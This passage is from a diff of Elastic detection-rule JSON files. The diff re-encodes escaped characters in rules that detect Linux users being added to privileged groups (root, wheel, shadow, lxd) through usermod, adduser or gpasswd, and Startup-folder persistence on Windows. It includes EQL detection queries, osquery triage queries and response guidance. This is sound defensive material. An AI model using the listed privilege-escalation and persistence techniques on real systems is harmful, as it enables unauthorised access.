the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json index 2cddba9db6d..9b1262149d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json index 1b7a135d769..ca2c2833e42 100644 --- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json index 5c3179e4cff..f80f32e0723 100644 --- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json index 07f139de324..7358af3f6e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n 